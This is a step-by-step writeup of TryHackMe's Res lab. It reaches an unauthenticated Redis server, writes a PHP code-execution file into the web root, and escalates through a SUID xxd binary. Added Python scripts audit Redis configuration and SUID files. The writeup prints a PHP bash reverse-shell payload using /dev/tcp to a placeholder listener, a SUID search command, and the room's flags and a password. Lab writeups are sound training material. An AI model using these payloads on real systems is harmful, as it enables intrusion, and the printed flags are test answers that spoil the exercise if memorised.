TryHackMe’s Res CTF Writeup: Step by Step
Hello hackers!
Welcome to another CTF writeup. Today we are going to complete TryHackMe’s Res CTF room. So, without further ado, let’s dive in.
First things first, let’s start with enumeration using our one and only nmap.

Here we see only 2 ports open after a full port scan, and that is the answer to our first question, how many ports are open: 2.
We all know what HTTP and port 80 are for, but Redis and port 6379 are new, so what do we do? That’s right everyone, we google it, and we find the following details:

So basically it’s a DBMS (an in-memory key-value store) with some specific features and characteristics.
That also gives us the answers to the second and third questions: the DBMS installed is Redis, and it runs on port 6379.
Looking back at the nmap scan, the Redis service reports version 6.0.7, which is our fourth question’s answer.
To summarise the enumeration so far: we have Redis 6.0.7 on port 6379 and an HTTP service on port 80. Port 80 serves the default Apache2 homepage, so we can run gobuster to look for possible web directories. Let’s do it.

Now we have only one option left, which is to research Redis 6.0.7.
After some research I found that we can connect to the Redis server with the redis-cli client, which is installed with the following command:
sudo apt-get install redis-tools
Now we can connect to the Redis host using the following command:
redis-cli -h <targetIP>
Redis can require a username and password to connect, but our host is not configured that way, as we can see by running the info command. The info output also shows a possible user on our target machine named vianka.
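From the defender’s side, the reason that connection succeeded without credentials is purely a configuration matter. The following is an added example, not part of the original writeup or of Redis itself: a small Python audit that parses a redis.conf and flags the settings that together allow an unauthenticated remote client to run INFO and to use CONFIG SET to redirect where the database file is written. The two sample configurations are constructed for illustration, and the password value is a placeholder.

```python
"""Audit a redis.conf for the settings that let an unauthenticated
remote client talk to Redis. Added example, not from the original writeup.
The two configurations below are constructed for illustration."""

# Constructed: a listener on 6379 reachable from the network, with
# protected mode switched off and no password configured.
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed: the same server hardened. The requirepass value is a
# placeholder; use a long random secret in a real deployment.
HARDENED_CONF = """
bind 127.0.0.1
port 6379
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
dbfilename dump.rdb
"""

# Tokens that make a bind directive listen on every interface.
WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}


def parse_redis_conf(text):
    """Return {directive: [values]}. Directives such as rename-command may
    repeat, so every occurrence is kept in order."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)
    return conf


def audit_redis_conf(text):
    """Return a list of human-readable findings; an empty list means
    none of the checked weaknesses is present."""
    conf = parse_redis_conf(text)
    findings = []

    # Protected mode only applies when no bind is configured, so an explicit
    # wildcard bind exposes the port regardless of the protected-mode flag.
    binds = conf.get("bind", [])
    tokens = {tok.lstrip("-") for b in binds for tok in b.split()}
    if not binds or tokens & WILDCARD_BINDS:
        findings.append("bind: listening on all interfaces; Redis is reachable from the network")

    # protected-mode defaults to yes; only an explicit 'no' is flagged.
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients are accepted")

    # Either a legacy requirepass or ACL users must be present.
    if not conf.get("requirepass") and not conf.get("user"):
        findings.append("no requirepass or ACL users: INFO and CONFIG run without credentials")

    # Renaming CONFIG to an empty string disables it; without that, a client
    # can change dir/dbfilename and make the RDB dump land in any writable path.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not disabled: CONFIG SET dir/dbfilename can redirect the dump file")

    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for finding in audit_redis_conf(conf) or ["no findings"]:
            print("  -", finding)
```

Run against a real server’s redis.conf the same way (read the file and pass its text to audit_redis_conf). Any one finding on its own is a weakness; the combination of all four is exactly the situation this room presents on port 6379.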

We can write our RCE payload into this database and trigger it through the HTTP service. To do that we need the web root on the target machine; nmap OS detection shows it is running Linux, so we can assume the web directory is /var/www/html. Now let’s add our RCE there:

Above we can see that our RCE was successful, so now it is time for a reverse shell. We can add the reverse shell the same way as above:

"<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/PORT 0>&1'\"); ?>"
Use the PHP reverse shell above, changing YOUR_IP and PORT to your own listener. Start a netcat listener, then open the file in the browser to execute the reverse shell.
Now play around and search for flags. We find our first flag at /home/vianka. Next we try to escalate our privileges.
We look for files with the SUID bit set using the find command:
find / -type f -perm -u=s 2>/dev/null
We get a lot of SUID results, and after trying many of them I found /usr/bin/xxd. Use it to escalate your privileges as described at https://gtfobins.github.io/gtfobins/xxd/#suid .
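The find command above is the same one a defender uses to spot this problem before an attacker does: the SUID bit on xxd is not something a stock install ships with. Below is an added example, not part of the original writeup, that compares a SUID listing against a baseline of binaries expected to carry the bit and reports the rest. The sample find output and the baseline set are constructed for illustration; a real baseline should be generated from a known-good image of the same distribution.

```python
"""Compare SUID binaries against a known-good baseline.
Added example, not from the original writeup. Sample data is constructed."""
import os
import stat

# Constructed: roughly what `find / -type f -perm -u=s 2>/dev/null`
# prints on a box where xxd has been given the SUID bit.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/xxd
/usr/bin/mount
/bin/ping
/usr/lib/openssh/ssh-keysign
"""

# Constructed baseline of binaries that legitimately carry SUID on a stock
# Debian/Ubuntu install. Generate this from a clean image in practice.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/ping", "/usr/lib/openssh/ssh-keysign",
}


def normalize(path):
    """Fold the merged-/usr aliases so /bin/ping and /usr/bin/ping compare equal."""
    for old, new in (("/bin/", "/usr/bin/"), ("/sbin/", "/usr/sbin/"), ("/lib/", "/usr/lib/")):
        if path.startswith(old):
            return new + path[len(old):]
    return path


def unexpected_suid(find_output, baseline=EXPECTED_SUID):
    """Return the sorted SUID paths from a find listing that are not in the baseline."""
    found = {normalize(line.strip()) for line in find_output.splitlines() if line.strip()}
    expected = {normalize(p) for p in baseline}
    return sorted(found - expected)


def find_suid_files(root="/"):
    """Walk the live filesystem and return regular files with the SUID bit set.
    Uses lstat so symlinks are not followed; unreadable entries are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


if __name__ == "__main__":
    # Offline mode: audit the constructed sample listing.
    for path in unexpected_suid(SAMPLE_FIND_OUTPUT):
        print("unexpected SUID binary:", path)
    # Live mode: uncomment to audit the host this script runs on.
    # print(unexpected_suid("\n".join(find_suid_files("/"))))
```

Anything the script reports (here /usr/bin/xxd) is a binary whose SUID bit should be justified or removed with chmod u-s; scheduling this comparison as a periodic check turns the room’s privilege-escalation step into an alert.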

user.txt: thm{red1s_rce_w1thout_credent1als}
local user pass: beautiful1
root.txt: thm{xxd_pr1v_escalat1on}
Congratulations! We have completed TryHackMe’s Res CTF together. This CTF was really helpful for learning about new services, how to research them, how to communicate with them, and how to use them to gain a foothold. Thank you TryHackMe, the room creators, and the awesome hackers who are reading this. And remember, it’s totally okay to read writeups if you are stuck; nobody knows everything, and it’s okay to rely on someone or something. With that said, thank you again for reading, and comment on how you found my writeup. Keep hacking!